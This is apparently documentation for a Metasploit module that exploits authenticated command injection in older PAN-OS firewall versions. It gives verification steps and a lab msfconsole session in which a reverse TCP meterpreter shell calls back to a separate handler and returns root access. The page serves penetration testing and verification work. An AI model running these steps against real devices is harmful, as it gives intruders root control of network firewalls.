jheysel-r7
1.5 KiB
1.5 KiB
This module exploits an authenticated OS Command Injection vulnerability in PAN-OS versions: <10.0.1, <9.1.4 and <9.0.10
Vulnerable Application
A Palo Alto Firewall demo can be requested at the following link
Verification Steps
- Install the application
- Start msfconsole
- Do:
use exploit/linux/http/panos_auth_rce - Set the
RHOST,USERNAME, andPASSWORDoptions - Run the module
- Receive a meterpreter session
Scenario: PAN-OS 10.0.0
msf6 > use linux/http/panos_auth_rce
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/panos_auth_rce) > set rhosts 192.168.2.196
rhosts => 192.168.2.196
msf6 exploit(linux/http/panos_auth_rce) > set USERNAME admin
USERNAME => admin
msf6 exploit(linux/http/panos_auth_rce) > set PASSWORD N0tpassword!
PASSWORD => N0tpassword!
msf6 exploit(linux/http/panos_auth_rce) > run
[*] Started reverse TCP handler on 192.168.2.114:4444
[*] Authenticating...
[+] Successfully obtained api key
[*] Exploiting...
[*] Sending stage (3020772 bytes) to 192.168.2.196
[*] Meterpreter session 1 opened (192.168.2.114:4444 -> 192.168.2.196:51132) at 2022-08-16 09:01:47 -0400
[*] Command Stager progress - 100.00% done (1326/1326 bytes)
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : PA-VM-10-0-0.home
OS : Red Hat (Linux 3.10.0-957.21.3.10.pan.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >